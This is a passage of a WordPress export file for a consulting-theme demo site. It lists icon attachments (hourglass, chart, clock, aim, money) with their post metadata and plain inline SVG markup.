		</wp:postmeta>
							</item>
					<item>
		<title>hourglass</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/hourglass/</link>
		<pubDate>Wed, 09 Sep 2020 07:46:57 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/hourglass.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>650</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:46:57]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:46:57]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[hourglass]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/hourglass.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/hourglass.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/chart/</link>
		<pubDate>Wed, 09 Sep 2020 08:11:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>653</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:11:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:11:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/chart.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>clock</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/clock/</link>
		<pubDate>Wed, 09 Sep 2020 08:23:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/clock.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>659</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:23:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:23:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[clock]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/clock.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/clock.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>aim</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/aim/</link>
		<pubDate>Wed, 09 Sep 2020 08:24:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/aim.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>660</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:24:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:24:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[aim]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/aim.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/aim.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>money</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/money/</link>
		<pubDate>Wed, 09 Sep 2020 08:25:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/money.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>663</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:25:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:25:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[money]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/money.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/money.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>portfolio</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/portfolio-2/</link>
		<pubDate>Wed, 09 Sep 2020 08:35:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/portfolio.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>666</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:35:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:35:27]]></wp:post_date_gmt>
